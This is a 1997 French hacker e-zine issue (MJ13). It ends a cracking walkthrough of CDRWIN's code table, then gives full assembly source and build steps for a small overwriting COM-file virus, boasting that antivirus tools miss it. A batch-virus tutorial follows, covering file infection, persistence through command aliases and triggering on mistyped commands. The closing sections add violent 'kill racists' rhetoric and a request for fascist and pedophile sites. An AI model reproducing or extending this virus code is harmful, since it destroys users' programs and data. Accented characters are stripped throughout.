Lecture d'un code dans une table point=E9e par ESI+EAX
EAX maxi =3D 3C (cf AND 3C), la table aura donc 16 mots
de 32 bits
XOR EAX,ECX
Ou exclusif entre eax et ecx vers eax
DEC DI
Test fin de chaine
JNZ 419199
Reboucle si pas la fin de chaine
Table pointe par ESI : (cette table est dans CDRWIN.EXE)
-----------------------
ESI+00 : 00 00 00 00 7E 88 3E 1C
ESI+08 : FC 10 7D 38 82 98 43 24
ESI+10 : F8 21 FA 70 86 A9 C4 6C
ESI+18 : 04 31 87 48 7A B9 B9 54
ESI+20 : F0 43 F4 E1 8E CB CA FD
ESI+28 : 0C 53 89 D9 72 DB B7 C5
ESI+30 : 08 62 0E 91 76 EA 30 8D
ESI+38 : F4 72 73 A9 8A FA 4D B5
ET vala.. comment ca s'est compliqu?????
*******************************************************************************
^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^
Virus exemple Nø1 UnK MnemoniK
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Voila , j'ai essayer de dtailler ici un virus trs simple et en meme temp
trs petit , l'astuce de cette petite taille est que le virus se propage en
crasant directement sur le fichier , ne tenant pas compte du programme
infect , ici , quand on lancera le fichier , il retournera directement sous
le prompt , bref on s'apercevra assez vite de l'infection , voir que l'on
rinstallera completement les progs infects , ce virus est dja a moiti
comdamn , il serait toujours amusant de le lacher sous c:\dos qu'on voie
la tte du technicien informatique ( que perso je n'arrive jamais a pifer ,
genre le type : euuuh , ce rseau est optimis (:ouarf le vocabulaire) pour
Ou-indoze95 , nos plateformes sont
la pointe de la technologie , hum hum
et ne touchez pas a ce clavier ; ou bien le type qui arrive quand tu veux
t'amuser sur une bcanne de dmonstration ou ya un pseudo internet qui en
fait n'est qu'une page html sur le disque ventant les mrites de la compagnie
aprs ce bref interlude , voici les explications
**************************************************************************
cette partie n'est que du blabla pour que turbo assembleur ne viennent pas
raler avec ses gros sabots
Ä
code segment
assume cs:code,ds:code,es:code,ss:code
org 100h
main proc near
Ä
La routine start a pour but de mettre en 9Eh le nom du premier fichier'*.com'se
trouvant dans ce repertoire grace a la subfonction 4Eh de l'intruption
21h (celle du dos ) , le fichier n'infectera pas les fichiers cachs ni
ceux en lecture seule , pour cela , il faut placer dans CX un code binaire
00000011B ou 2h
Ä
START:
MOV AL,0
MOV AH,4Eh
MOV DX,OFFSET COMFILE
INT 21H
JMP INFECTE ; saut sur le procssus d'infection
Ä
les routines close puis plus ont la fonction de fermer (3Eh) le fichier ouvert
et de rechercher le prochain fichier com sur le repertoire actuel (4Fh) ,
4Fh n'a besoin d'aucune prparation car elles sont fixe avec 4Eh
Ä
CLOSE:
MOV AH,3EH
INT 21H
PLUS:
MOV AH,4FH
INT 21H
OR AL,AL
JNZ BYE
Ä
ici le procssus d'infection tant trs primaire , il se dcompose comme
tant l'anti-rinfecteur et infecteur , je m'explique , il ne faut pas
que le virus s'crase tout le temp sur le meme fichier car l'infection
serait impossible puis si le test parait ngatif il infecte le fichier
Ä
INFECTE:
MOV AX,3D02H
MOV DX,OFFSET 9EH
INT 21H
MOV BX,AX
Ä
/³\ vous avez ici l'ouverture du fichier , a partir ce moment les actions
d'criture lecture sont possible sur le fichier , comme dans le basic
ce fichier est affect un numro plac en AX mais ca ne suffit pas car
pour les prochaines intruptions , le numro du fichier doit se trouver
en BX
Ä
MOV AH,3FH
MOV CX,2
MOV DX,OFFSET MTEST
INT 21H
CMP WORD PTR MTEST,00B0H
Ä
routine de test d'infection
comme comparaison , nous allons lire les 2 premiers octets (3Fh) et puis
les comparer avec ceux du virus (ici B000h (ne pas oublier d'inverser les
octets)) , pour ma part j'y ai mis une valeur fictive que j'ai remplac
une fois compil , et j'ai ensuite recompiler avec B000h , a noter que
MTEST contient les deux premiers octets du fichier
Oui mais si un fichier a dja 00B0H comme premiers octets? Les chances restantes
sont de 1/65535 , c'est a dire que l'on ne s'en inquiete pas , si le test
parait positif , il vas a close
Ä
JZ CLOSE
MOV AX,4200H
MOV CX,00
MOV DX,00
INT 21H
Ä
repositionnement du pointeur au dbut du fichier ( 42H )
Ä
MOV AH,40H
MOV CX,84 ; taille du prog
MOV DX,OFFSET START
INT 21H
Ä
ici criture de tous les octets depui start sur le fichier
Ä
BYE: RET
Ä
informations utiles au programme
Ä
COMFILE: DB 'coui*.com',0
MTEST: DW ?
main endp
code ends
end main
****************************************************************************
j'spre que vous aurez compris les mcanismes de ce virus trs petit
a cause de sa simplicit , pour le compiler faites tasm mj13.asm puis
tlink mj13.obj , amusez vous a refaire ou amliorez ce virus
Je garanti qu'a la sortie de cet article de MJ13 , ce virus n'est pas reconnu
par les anti-virus
NB : la version MJ13 n'infecte que les coui*.com tandis que la 0B infecte
tous les fichiers com
Prochain pisode : ca se transforme en infecteur COM
*** Envoyez vos questions ou mes bugs a Zorohack@hotmail.com
Spcial thanks a chico , si vous avez rien a faire allez voir les articles
de phalcon/skism et d'autres sur jesaisquellepage (:Alta vista ca existe non?
By -Û UnKM Û-
Thanks to Samson
^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^
******************************************************************************
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÍÍÍÍ VIRUS BATCHS - Un peu d'originalit cot virus ÍÍÍÍ
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * DISCLAMER: Vous tes seul responsable de l'utilisation de ce * *
* * document, et son auteur n'est en aucun cas responsable d'une * *
* * mauvaise utilisation par autrui.L'ecriture de ce texte n'est * *
* * pas illgale en France mais la cration de virus du type * *
* * decrit l'est. Les virus (ventuellement) fournis avec ce * *
* * logiciel ne sont l
qu'
but de dmonstration, et ne doivent * *
* * pas tre utiliss. * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
WARNING: Ncessite une BONNE connaissance du batch et du DOS.
NOTE: Mon but n'est pas vraiment de decrire comment crer un virus batch
fonctionnel (pour a lisez les fichiers C-WORM.TXT, V-WORM.TXT, VIRAL.TXT)
mais plutt de vous donner des conseils gnraux et d'expliquer certains
passages ardus de cette programmation.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 1/ iNTRODUCTION º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
C'est vrai a, il existe des milliers de virus EXE et COM, mais des virus
batchs (BAT) il en existe une vingtaine au grand maximum. Pourquoi? Ils
sont certes lents, pas TSR, gros, et il existe peu de fichiers BAT sur un
mme ordinateur. Cependant presque aucun anti-virus ne peut dtecter les
virus batchs, ce qui supprime d'un coup tout besoin de moteur de cryptage
et de routines d'anti-debugger.
De plus avec un bon niveau et de l'exprience (beaucoup) ont peu faire des
choses grandioses:
votre avis un virus batch peut-il:
1) Etre rsident?
2) Infecter des fichiers EXE et/ou COM?
3) Profiter des fautes de frappe pour s'activer?
4) Se dissimuler d'Edit et de DIR?
5) Dtecter 4DOS et ragir en l'exploitant?
6) Etre un infecteur rapide?
La rponse est OUI pour toutes ces questions, et j'affirme que seul un
utilisateur avanc peut les detecter si SmartDrv (ou autre) est en mmoire.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 2/ TECHNIQUES GENERALES º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
En ce qui concerne leur programmation proprement dite il faut avant toute
chose pour discerner le virus du code il faut rajouter une chaine de
caractres identique
toutes les lignes du virus pour le diffrencier du
programme infect. Exemple:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ @Echo off %Virus% ³ <- Dbut du virus
³ ... %Virus% ³
³ 'instructions du virus' %Virus% ³
³ goto EndVirus ³ <- ici la chaine est Virus
³ ³
³ :EndVirus ³ <- Fin du virus
³ @Echo off ³ <- Dbut du programme
³ cls ³
³ echo Programme infect ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Pour extraire le virus seulement dans un fichier il suffira de taper
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ TYPE %0.BAT | Find "Virus" >NewVir.bat ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
%0.BAT reprsente le nom du fichier qui vient d'etre lanc, sous 4DOS
%0.BAT peut tre une erreur et %0 le bon il faut donc dterminer lequel
employer:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ SET Good=%0 ³
³ If exist %0.BAT Set Good=%0.BAT ³
³ If exist %0 Set Good=%0 ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
et ensuite seulement:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ TYPE %Good% | Find "Virus" >NewVir.bat ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Pour infecter un fichier il ne vous restera qu'
taper:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Ren file.bat file.old ³ Le virus sera plac AVANT le
³ Copy Newvir.bat + file.old file.bat ³ programme.
³ Del file.old ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Ou encore en employant une structure lgrement diffrente, vous pouvez
rendre le code plus court et plus rapide.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Type Newvir.bat|find "Virus">>file.bat ³ Le virus sera plac APRES le
³ ³ Programme
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Cependant il vous faudra d'abord dtecter si le fichier que vous visez est
dj
infect ou non. Pour cel
vous devez gnrer un code du type suivant
qui crera un fichier $VIRUS.BAT
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ echo :virus >$Virus.BAT ³
³ echo find "Virus" %%1 >>$Virus.bat ³<- Recherche chaine de caractres
³ echo If errorlevel 1 goto Y >>$Virus.Bat ³<- Si trouv alors aller en Y
³ echo goto end >>$Virus.bat ³<- Sinon quitter
³ echo :Y >>$Virus.bat ³
³ echo Set ok=%%1 >>$Virus.bat ³<- Variable OK=Nom_du_fichier.bat
³ echo :End >>$Virus.bat ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Et ensuite appeler le fichier ainsi cr de la manire suivante.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ For %%a in (*.bat) do call $Virus %%a ³<- Boucle pour dtecter fichier
³ If (%ok%)==() goto Virusend ³<- Pas de fichier, quitter
³ ... 'code d'infection' ... ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
C'est tout pour les techniques gnrales,
vous de broder autour et de
recoller les morceaux de code dans le bon ordre :).
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 3/ ROUTINES º
ÈÍÍÍÍÍÍÍÍÍÍÍÍͼ
Passons maintenant
des routines plus complexes:
Un virus batch peut tre rsident, mais pas de la manire ou on l'entend
habituellement. En utilisant DOSKEY (command.com) ou ALIAS (4dos.com) vous
pouvez raffecter des commandes comme DIR par exemple. En supposant qu'un
appel
DIR lance votre virus imaginez les dgats. Avec l'alias de 4DOS
c'est totalement transparent, la command ALIAS DIR=`c:\virus.bat^*DIR` vous
dcharge de l'mulation du DIR par votre virus.
Mais du coup un problme se pose: comment dtecter 4DOS? simple il suffit
de rajouter un code du style
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ @Echo Off ³
³ If (%@eval[1+1])==(2) goto 4DOSFound ³
³ ... ³
³ 'instructions virus pour command.com' ³
³ ... ³
³ Goto EndVirus ³
³ :4DOSFound ³
³ ... ³
³ 'instructions virus pour 4DOS.COM' ³
³ ... ³
³ :EndVirus ³
³ 'debut de programme infect' ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Simple, non?
Une procdure trs simple permet d'activer votre virus batch lors des fautes
de frappe. En effet sous DOS on remarque un certain nombre de fautes
classiques telles que DIOR DUR DOR pour DIR, DEM pour DEL, EDIOT pour Edit,
etc...
Pour cel
il suffit d'extraire le code du virus et de le copier sous ces
diffrents noms dans un rpertoire du PATH (c:\dos par exemple), donnant:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ SET Virus=%0 ³
³ If exist %0.BAT Set Virus=%0.BAT ³
³ If exist %0 Set Virus=%0 ³
³ For %%a in (dior xcopu dem) do TYPE %Virus%|Find "Virus" >c:\dos\%%a.* ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
(
vous d'alonger la liste)
Pour infecter les fichiers EXE et COM votre virus doit tre compagnon, c-a-d
ayant le mme nom que le fichier infect. Je vous conseille de lire la FAQ
normalement dans ce E-Zine sur le moteur [C-WORM Engine v2.0].
Pour des dtails sur l'infection rapide, les modules rsidents et Stealth,
consultez les FAQs sur les moteurs [ViRAL-BATCH Engine v2.0] et
[V-WORM Engine v2.0à].
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 4/ ANTIVIRUS º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Il n'existe en ralit qu'un seul anti-virus batch performant, il les
detecte de manire heuristique et scanning, il dispose aussi d'un module
rsidant pour tenter de stopper des monstres du style 'BE-Happy!' ou 'm0o0m'
c'est BATCH ANTI-VIRUS v4.33 dont je suis l'auteur. L'interface est assez
rudimentaire mais efficace.
Certains antivirus commerciaux style TBAV (je crois) dtectent quelques
vieux virus mais rien de bien efficace.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 5/ REFERENCES º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Voici la courte liste des textes dit de rfrence en matire de virus
batchs:
C-WORM TXT - Documentation sur le moteur compagnon C-WoRM v2.00
V-WORM TXT - Documentation sur le moteur V-WoRM v2.00 àlpha (inachev)
VIRAL TXT - Documentation sur le moteur ViRAL-BATCH v2.00
BAT_MUF TXT - BATCH Microsoft Undocumented "Features"
BFVWG TXT - FAQ sur les virus batchs (anciens)
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 6/ CONSPiRACY oF DaRKNESS [CoD] º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Si vous ne respectez pas l'un des termes suivants alors n'utilisez pas
ce document et allez bruler en Enfer.
1/ L'utilisation/cration des virus pour la destruction d'une machine
appartenant
une tiers personne est condamne par [CoD] et par tous les
crateurs responsables.
2/ Il est interdit de modifier ce document, en cas de doute envoyez une
copie du document au groupe en indiquant u vous l'avez trouv.
3/ FUCK RACISM & KILL RACISTS, il existe des idaux pour lesquels il faut
encore tre prt
tuer/mourir (si Gros Blond gagnait les lections
prsidentielles par exemple).
ÄÄ ÄÄ
Voil
je crois que c'est tout pour cette fois. Je sais que ce texte peut ne
pas sembler trs clair de prime abord, mais il contient un complment
indispensable aux trois fichiers C-WORM.TXT, V-WORM.TXT, VIRAL.TXT.
ÄÄ ÄÄ
DaRK BiRD / CoD
Ecrit pour le groupe MJ13
******************************************************************************
Et voila... qui cloture l'issue #2.0
on va essayer d'etre plus speed pour la 3.
Pour contacter un menbre: alli427@hotmail.com
le courrier le concernant lui sera retransmis.
et n'oublions pas, nous recherchons des sites de fascisme & pedodophile.
ALLIGATOR427 / MJ13
03/1997
